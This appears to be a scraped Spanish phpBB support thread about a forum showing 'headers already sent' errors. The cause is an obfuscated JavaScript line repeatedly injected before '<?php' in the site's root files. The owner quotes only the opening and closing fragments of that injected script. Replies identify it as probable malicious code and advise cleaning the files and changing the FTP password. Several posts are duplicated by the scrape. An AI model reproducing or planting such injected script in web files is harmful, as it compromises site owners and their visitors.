Recordad que para pedir soporte alguno, debéis facilitar los datos de soporte oportunos por favor, mirad aquí y leer las Normas generales del foro, esto nos servirá de ayuda para dar el mejor soporte..
Gracias.
La Administración de phpBB España.
Problema con mensaje de error en el foroTema Solucionado
Problema con mensaje de error en el foro
Antes de todo, hola a todos.
Pues la verdad es que tengo un problema, y no se si es gordo o no. pero me lleva de cabeza.
Sin hacer nada en el foro y yendo todo bien,derepente me sale el siguiente mensaje en la cabecera del foro.
[phpBB Debug] PHP Notice: in file /includes/session.php on line 1007: Cannot modify header information - headers already sent by (output started at /index.php:1)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 1007: Cannot modify header information - headers already sent by (output started at /index.php:1)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4284: Cannot modify header information - headers already sent by (output started at /index.php:1)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4286: Cannot modify header information - headers already sent by (output started at /index.php:1)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4287: Cannot modify header information - headers already sent by (output started at /index.php:1)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4288: Cannot modify header information - headers already sent by (output started at /index.php:1)
No tengo ni idea que puede ser, ya he estoy recien llegado a esto del phpbb.
Si me puedieran ayudar, les estaria eternamente agradecido.
Nota: si necesitan que les suba algun archivo, solo decirmelo.
Muchas gracias
URL: http://www.darkshooter.com
Versión phpBB: phpBB3 (3.0.7-PL1)
MODs Instalados: Tenia el ACP annunce, pero ya no
Plantilla(s) usada(s): WoW aliance
Servidor: Linux de pago
Actualización desde otra versión: No
Conversión desde otro sistema de foros: No
Pues la verdad es que tengo un problema, y no se si es gordo o no. pero me lleva de cabeza.
Sin hacer nada en el foro y yendo todo bien,derepente me sale el siguiente mensaje en la cabecera del foro.
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4284: Cannot modify header information - headers already sent by (output started at /index.php:1)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4286: Cannot modify header information - headers already sent by (output started at /index.php:1)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4287: Cannot modify header information - headers already sent by (output started at /index.php:1)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4288: Cannot modify header information - headers already sent by (output started at /index.php:1)
No tengo ni idea que puede ser, ya he estoy recien llegado a esto del phpbb.
Si me puedieran ayudar, les estaria eternamente agradecido.
Nota: si necesitan que les suba algun archivo, solo decirmelo.
Muchas gracias
MODs Instalados: Tenia el ACP annunce, pero ya no
MODs Instalados: ACP anuncement
Re: Problema con mensaje de error en el foro
no tienes ningun mod instalado no? trate de subir un index.php limpio , no lo sobreescribas, borra el otro y luego subes el limpio, aver si se soluciona
Antes de nada, lee las Normas de phpBB-Es, y el siempre útil Foro de guías sobre phpBB 3.
Consulta la Documentación de phpBB 2 y phpBB 3 y sus correspondientes FAQS de ayuda.
Administra, modifica, actualiza tu foro con el listado de Guías de nuestra Biblioteca.
Quizás tu duda esté resuelta, y todos ahorremos tiempo.
Si es sobre cómo Crear una Consulta SQL ya lo tienes explicado en el enlace.
En general, se recomienda Buscar antes de preguntar para no repetir preguntas y dudas resueltas.
Sólo tendrás Soporte si facilitas los datos correspondientes y si respetas completamente el Copyright de phpBB.
NOTA: No damos Soporte a los foros integrados en Nuke y derivados del mismo. Infórmate AQUÍ.
[hr]
No doy soporte por MP ni por MSN ni por el Chat
[hr]
© Jakk - www.ivemfinity.com | © chirri23 - www.mundoforeros.com | Foro de Pruebas
Consulta la Documentación de phpBB 2 y phpBB 3 y sus correspondientes FAQS de ayuda.
Administra, modifica, actualiza tu foro con el listado de Guías de nuestra Biblioteca.
Quizás tu duda esté resuelta, y todos ahorremos tiempo.
Si es sobre cómo Crear una Consulta SQL ya lo tienes explicado en el enlace.
En general, se recomienda Buscar antes de preguntar para no repetir preguntas y dudas resueltas.
Sólo tendrás Soporte si facilitas los datos correspondientes y si respetas completamente el Copyright de phpBB.
NOTA: No damos Soporte a los foros integrados en Nuke y derivados del mismo. Infórmate AQUÍ.
[hr]
No doy soporte por MP ni por MSN ni por el Chat
[hr]
© Jakk - www.ivemfinity.com | © chirri23 - www.mundoforeros.com | Foro de Pruebas
Hola jakk gracias por responder.
Te explico.
El asunto es que en varios archivos, index, log,viewforum, etc, etc. aparece en la primera linea antes del <?php una linea extremadamente larga. si elimino esa linea y dejo como primera linea solo el <?php, se soluciona el problema.
Ya me paso hace una semana lo mismo y decidi reinstalar todo, ya que no habia casi nada en el foro, pero ahora me ha vuelto a salir el mismo error y solo lo he solucionado como te he comentado antes.
La primera linea empieza asi:
<script type='text/javascript'>function hT(){};this.xA='';hT.prototype = {gS : function() {var eA=9087;var o=function()
Y termina asi:
{};nI=52234;this.cB="cB";}};this.lR=15709;var bB=new hT(); var gC='';bB.m();mC=23088;</script><?php
Es normal que me ponga esa linea de codigo antes del <?php , por que si la elimino, mano de santo, funciona todo perfecto, el problema es que con el tiempo me la crea otra vez.
Nota: no la pongo toda por ser muy extensa, pero si quieres la pongo.
Gracias por todo.
Te explico.
El asunto es que en varios archivos, index, log,viewforum, etc, etc. aparece en la primera linea antes del <?php una linea extremadamente larga. si elimino esa linea y dejo como primera linea solo el <?php, se soluciona el problema.
Ya me paso hace una semana lo mismo y decidi reinstalar todo, ya que no habia casi nada en el foro, pero ahora me ha vuelto a salir el mismo error y solo lo he solucionado como te he comentado antes.
La primera linea empieza asi:
<script type='text/javascript'>function hT(){};this.xA='';hT.prototype = {gS : function() {var eA=9087;var o=function()
Y termina asi:
{};nI=52234;this.cB="cB";}};this.lR=15709;var bB=new hT(); var gC='';bB.m();mC=23088;</script><?php
Es normal que me ponga esa linea de codigo antes del <?php , por que si la elimino, mano de santo, funciona todo perfecto, el problema es que con el tiempo me la crea otra vez.
Nota: no la pongo toda por ser muy extensa, pero si quieres la pongo.
Gracias por todo.
- engendro666
ponla toda en un archivo de texto comprimelo y subelo como adjunto. Eso no es normal, y si se crea sola... mmm no se no soy muy entendido del tema pero juraria que es codigo malicioso, por las dudas revisa si tienes algun otro archivo "extraño" entre los archivos de tu foro.
Datos de Soporte:
Spoiler
Requiem Latino
Versión phpBB: 3.0.11
MODs Instalados:
Servidor: 99h
Versión phpBB: 3.0.11
MODs Instalados:
- FAQ Manager
- Rules Page 1.0.1
- STK 1.0.4
- avatar on index and viewforum 1.2.1
- Country Flags User Edition 1.2.1
- Knowledge Base 0.2.1
- Prime Birthdate
- Profile Views
- Tabbed Profiles
- Skype Mod
- Genders
- Facebook Profile Link
- Twitter Profile Link
- Prime Links
- Annual Stars
- Primetime 1.0.5
Servidor: 99h
me suena a que eso es código malicioso incorporado a tu foro.
1.- Limpia todos los archivos .php y .html de tu foro, quitando esa línea de cada archivo
2.- Cambia la contraseña del FTP de tu servidor.
1.- Limpia todos los archivos .php y .html de tu foro, quitando esa línea de cada archivo
2.- Cambia la contraseña del FTP de tu servidor.
Der Mensch schuf Gott nach seinem eigenen Bild
Berlín siempre estará en mi corazón. Auf wiedersehen, Berlin!!
Re: Problema con mensaje de error en el foro Tema Solucionado
antes de todo, muchas gracias a todos.
He limpiado todos los archivos php y solo lo tenian los que estaban en la raiz (espero haberlos revisado todos)
Agrego el archivo functions.php
MODs Instalados: Ninguno
He limpiado todos los archivos php y solo lo tenian los que estaban en la raiz (espero haberlos revisado todos)
Agrego el archivo functions.php
MODs Instalados: Ninguno